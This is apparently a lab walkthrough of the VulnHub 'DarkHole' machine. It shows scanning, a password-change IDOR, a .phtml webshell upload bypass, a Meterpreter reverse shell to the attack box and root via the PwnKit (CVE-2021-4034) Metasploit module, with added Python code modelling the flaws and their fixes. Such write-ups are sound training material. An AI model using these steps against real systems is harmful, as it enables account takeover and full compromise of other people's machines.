DarkHole

Target description

https://www.vulnhub.com/entry/darkhole-1,724

Host discovery

┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap -sn 192.168.1.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:45 CST
Nmap scan report for 192.168.1.1
Host is up (0.00035s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00053s latency).
MAC Address: 00:50:56:E8:96:F1 (VMware)
Nmap scan report for 192.168.1.4
Host is up (0.00052s latency).
MAC Address: 00:0C:29:61:27:92 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00028s latency).
MAC Address: 00:50:56:EF:22:46 (VMware)
Nmap scan report for 192.168.1.5
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.04 seconds

The target is 192.168.1.4 (MAC prefix 00:0C:29, a VMware guest); 192.168.1.5, the host reported without a MAC address, is the Kali attack box, as the Metasploit output later confirms.

nmap scan

(1) Full TCP port scan

┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.1.4 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:46 CST
Nmap scan report for 192.168.1.4
Host is up (0.0058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:61:27:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
  • Ports 22 (SSH) and 80 (HTTP) are open.

(2) Service and OS detection on the open ports

┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80 192.168.1.4 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:47 CST
Nmap scan report for 192.168.1.4
Host is up (0.0029s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 00:0C:29:61:27:92 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.63 seconds

  • The package strings (OpenSSH 8.2p1 "4ubuntu0.2", Apache 2.4.41) are those of Ubuntu 20.04 (focal); this matters later when picking a privilege-escalation exploit.
  • The OSScan warning appears because only the two open ports were passed with -p. OS fingerprinting also needs one closed port, so include an unused port in the list if the OS guess matters.

(3) UDP scan. Only UDP 22 and 80 were probed here, which tells us little (SSH and HTTP are TCP services); a pass over the most common UDP ports would be the more useful check, since services such as DNS, SNMP and TFTP would otherwise be missed.

┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap -sU -p22,80 192.168.1.4 -oA nmapscan/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:48 CST
Nmap scan report for 192.168.1.4
Host is up (0.00033s latency).

PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:61:27:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

(4) Vulnerability scan with nmap's vuln script category. Two findings matter later: http-enum reports that /upload/ and /config/ have directory listing enabled, and http-cookie-flags shows the PHPSESSID cookie is set without HttpOnly.

┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap --script=vuln -p22,80 192.168.1.4 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:48 CST
Nmap scan report for 192.168.1.4
Host is up (0.00049s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.4
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.4:80/login.php
| Form id: login__username
| Form action: login.php
|
| Path: http://192.168.1.4:80/register.php
| Form id: login__username
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /login.php: Possible admin folder
| /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
MAC Address: 00:0C:29:61:27:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.21 seconds

Web penetration

Port 80

(1) Directory enumeration

┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo gobuster dir -u http://192.168.1.4 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.4
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 276]
/.php (Status: 403) [Size: 276]
/index.php (Status: 200) [Size: 810]
/login.php (Status: 200) [Size: 2507]
/register.php (Status: 200) [Size: 2886]
/upload (Status: 301) [Size: 311] [--> http://192.168.1.4/upload/]
/css (Status: 301) [Size: 308] [--> http://192.168.1.4/css/]
/js (Status: 301) [Size: 307] [--> http://192.168.1.4/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/config (Status: 301) [Size: 311] [--> http://192.168.1.4/config/]
/dashboard.php (Status: 200) [Size: 21]
/.php (Status: 403) [Size: 276]
/.html (Status: 403) [Size: 276]
/server-status (Status: 403) [Size: 276]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================

(2) Browsing to port 80 shows a login page.

Web logic vulnerability

(1) Register a new account and log in; the account page lets the user change their password.

(2) Capture the password-change request in a proxy. Besides the new password, the POST body carries an id parameter that names the user whose password is being set.

(3) Replay the request with id changed to 1. The server never checks that the id belongs to the logged-in session, so the password of user 1 is overwritten with the value we chose.

(4) Log in as that user with the new password. It works, and the logged-in area has a file-upload function.

(5) Try to upload a webshell: the application refuses it, saying only jpg, png and gif files are allowed.

(6) After a few attempts, renaming the file to a .phtml extension gets it accepted. The message claims an image allowlist, but the behaviour is that of a denylist on .php: .phtml is not on it, and the default Apache PHP module configuration on Ubuntu hands .php, .phtml and .phar files to the interpreter, so the upload executes when it is requested from /upload/ (which the earlier http-enum output showed has directory listing enabled, making the file easy to find).

(7) Connect to the uploaded file with Godzilla (哥斯拉), a webshell management tool; the connection succeeds.

(8) A Godzilla webshell is request/response only, not an interactive session, so the next step is to obtain a proper reverse shell.

  • Use Godzilla's PMeterpreter plugin to spawn the reverse shell

  • Start the listener

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (39927 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.4:37968) at 2025-02-08 22:47:24 +0800

meterpreter >
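The password-change flaw in steps (1) to (4) is an insecure direct object reference: the server takes the target user from the request instead of from the session. The DarkHole PHP source is not on this page, so the Python below is an added example and not the application's code; the form field names id and password, the in-memory user table and the use of id 1 for the privileged account are assumptions. It replays the attack against a handler that trusts the client-supplied id and against a fixed handler that binds the target to the session.

```python
"""Added example: model of the DarkHole password-change IDOR (not the app's code).

Hypothetical reconstruction of the behaviour seen in the walkthrough: the
password-change POST carries an `id` field and the server updates whichever
row that id points at.  Field names and the user table are assumptions.
"""
import hashlib
import hmac
import secrets
from typing import Optional


def hash_password(password: str, salt: Optional[str] = None) -> str:
    """PBKDF2-SHA256 stored as salt$digest (stands in for PHP's password_hash)."""
    salt = salt or secrets.token_hex(8)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 50_000).hex()
    return f"{salt}${digest}"


def verify_password(password: str, stored: str) -> bool:
    salt, _ = stored.split("$", 1)
    return hmac.compare_digest(hash_password(password, salt), stored)


class App:
    """Constructed in-memory stand-in for the site's users table and PHP sessions."""

    def __init__(self):
        # Assumption: id 1 is the pre-existing privileged account.
        self.users = {1: {"username": "admin", "password": hash_password("s3cret-admin")}}
        self.sessions = {}  # PHPSESSID -> user id

    def register(self, username: str, password: str) -> int:
        uid = max(self.users) + 1
        self.users[uid] = {"username": username, "password": hash_password(password)}
        return uid

    def login(self, username: str, password: str) -> Optional[str]:
        for uid, user in self.users.items():
            if user["username"] == username and verify_password(password, user["password"]):
                sid = secrets.token_hex(16)
                self.sessions[sid] = uid
                return sid
        return None

    def change_password_vulnerable(self, sid: str, form: dict) -> int:
        """Behaviour observed in step (3): the target row comes from the POST body."""
        if sid not in self.sessions:
            raise PermissionError("not logged in")
        uid = int(form["id"])  # attacker-controlled, never compared with the session
        self.users[uid]["password"] = hash_password(form["password"])
        return uid

    def change_password_fixed(self, sid: str, form: dict) -> int:
        """Fix: the only row a session may update is its own."""
        if sid not in self.sessions:
            raise PermissionError("not logged in")
        uid = self.sessions[sid]
        if "id" in form and int(form["id"]) != uid:
            # Worth logging: a mismatched id is an attack indicator, not a user error.
            raise PermissionError("id does not belong to this session")
        self.users[uid]["password"] = hash_password(form["password"])
        return uid


def takeover_admin(app: App, change_password) -> bool:
    """Replays steps (1)-(4): register, log in, send id=1, then log in as admin."""
    app.register("attacker", "attacker")
    sid = app.login("attacker", "attacker")
    try:
        change_password(sid, {"id": "1", "password": "pwned"})
    except PermissionError:
        return False
    return app.login("admin", "pwned") is not None


if __name__ == "__main__":
    vuln, fixed = App(), App()
    print("vulnerable handler, admin taken over:", takeover_admin(vuln, vuln.change_password_vulnerable))
    print("fixed handler, admin taken over:", takeover_admin(fixed, fixed.change_password_fixed))
```

The fixed handler rejects rather than silently ignores a foreign id; a request carrying someone else's id is only ever sent by a tampered client, so it should fail loudly and be logged.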
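Step (6) deserves a closer look: the server claims an image allowlist, yet a .phtml file passed, which is what a denylist on .php looks like. The Python below is an added example, not the DarkHole upload code (which is not on the page). It reconstructs a hypothetical denylist check, puts a hardened allowlist-plus-magic-bytes check beside it, and models which file names Ubuntu's Apache PHP module would actually execute, using the `<FilesMatch ".+\.ph(ar|p|tml)$">` directive from /etc/apache2/mods-available/php*.conf. The sample uploads are constructed.

```python
"""Added example: why shell.phtml got through, and a check that would stop it (not DarkHole's code)."""
import re
from typing import Optional

# Files Apache hands to the PHP engine on Ubuntu/Debian, copied from the
# libapache2-mod-php FilesMatch directive.  Case-sensitive, as Apache's is.
PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the three formats the site says it accepts.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def denylist_check(filename: str) -> bool:
    """Hypothetical reconstruction of the site's check: reject .php only.

    Reproduces the observed behaviour (shell.php refused, shell.phtml
    accepted); the real PHP source is not on the page.
    """
    return not filename.lower().endswith(".php")


def sniff_image(data: bytes) -> Optional[str]:
    """Image type implied by the leading bytes, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def allowlist_check(filename: str, data: bytes) -> bool:
    """Hardened check: final extension must be an image type and the bytes must agree."""
    if "." not in filename:
        return False
    ext = filename.rsplit(".", 1)[1].lower()  # last extension only: 'x.php.gif' -> 'gif'
    if ext not in IMAGE_EXTENSIONS:
        return False
    kind = sniff_image(data)
    return kind is not None and kind == ("jpg" if ext == "jpeg" else ext)


def apache_executes(filename: str) -> bool:
    """Would the default Ubuntu PHP handler run this file if it sits under the web root?"""
    return PHP_HANDLER.match(filename) is not None


def evaluate(filename: str, data: bytes) -> dict:
    return {
        "denylist_accepts": denylist_check(filename),
        "allowlist_accepts": allowlist_check(filename, data),
        "apache_executes": apache_executes(filename),
    }


# Constructed samples: a PHP payload under several names, plus a real GIF header.
PHP_PAYLOAD = b"<?php phpinfo(); ?>"
GIF_BYTES = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00"

SAMPLES = {
    "shell.php": PHP_PAYLOAD,      # refused by both checks, would execute
    "shell.phtml": PHP_PAYLOAD,    # the bypass: denylist passes it, Apache executes it
    "shell.phar": PHP_PAYLOAD,     # same story with the third handler extension
    "shell.gif": PHP_PAYLOAD,      # denylist passes; allowlist rejects on magic bytes
    "shell.php.gif": PHP_PAYLOAD,  # double extension: not executed by this FilesMatch
    "photo.gif": GIF_BYTES,        # a legitimate upload, accepted by both
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:15} {evaluate(name, data)}")
```

Extension and content checks are only half of the fix: the hardened handler should also store the file under a server-generated name in a directory that is not executable by PHP (or outside the web root entirely) and switch off directory listing for /upload/, so that even a file that slips past the checks cannot be found and run.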

Privilege escalation: PwnKit (CVE-2021-4034)

(1) Use linux-exploit-suggester.sh to list privilege-escalation candidates. Upload the script to a temporary directory first:

meterpreter > upload /miao/vulnhub/lampiao/linux-exploit-suggester.sh /tmp/1.sh
[*] Uploading : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Uploaded -1.00 B of 88.80 KiB (-0.0%): /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Completed : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
meterpreter >

(2) Run the script from the www-data shell to see which escalation paths it suggests

meterpreter > shell
Process 10161 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /tmp
chmod +x 1.sh
./1.sh

(3) Among the script's suggestions is CVE-2021-4034 (PwnKit, a local privilege escalation in polkit's pkexec)

(4) Search Metasploit for a matching module

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search cve_2021_4034

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 2022-01-25 excellent Yes Local Privilege Escalation in polkits pkexec
1 \_ target: x86_64 .
2 \_ target: x86 .
3 \_ target: aarch64 .

Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
After interacting with a module you can manually set a TARGET with set TARGET 'aarch64'

(5) Use the module against the existing Meterpreter session. Its automatic check (AutoCheck) confirms the target is vulnerable before the payload is staged:

msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter php/linux www-data @ darkhole 192.168.1.5:4444 -> 192.168.1.4:37968 (192.168.1.4)

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.dhoapptcyi
[+] The target is vulnerable.
[*] Writing '/tmp/.bhwmihxok/xtkbwpd/xtkbwpd.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.bhwmihxok
[*] Sending stage (3045380 bytes) to 192.168.1.4
[+] Deleted /tmp/.bhwmihxok/xtkbwpd/xtkbwpd.so
[+] Deleted /tmp/.bhwmihxok/.jqyjmbhdcuu
[+] Deleted /tmp/.bhwmihxok
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 192.168.1.4:37970) at 2025-02-08 23:00:06 +0800
meterpreter >

(6) The new session runs as root

meterpreter > getuid
Server username: root

Reading the flag

meterpreter > shell
Process 12372 created.
Channel 1 created.
cat /root/root.txt
DarkHole{You_Are_Legend}

Summary

(1) Godzilla's PMeterpreter plugin can spawn a Meterpreter reverse shell straight from the webshell, which saves crafting a reverse-shell one-liner by hand.
(2) Polkit (formerly PolicyKit) is the component that controls system-wide privileges on Unix-like systems: it gives unprivileged processes a structured way to ask privileged ones to perform an action. Its pkexec helper runs a command as another user (root by default) after a polkit authorization check, and is installed setuid root for that purpose. CVE-2021-4034 (PwnKit) is a flaw in pkexec's argument handling: when it is started with an empty argument list it reads and writes past the end of the argv array, which any local user can turn into code execution as root. A shell as low-privileged as the www-data one obtained through the upload is enough to exploit it; the fix is the distribution's polkit update, with removing the setuid bit from pkexec as a stopgap.


DarkHole
http://miao-sec.github.io/Vulnhub/DarkHole/
Author: Miao
Published: 20 June 2025
License: BY-MIAO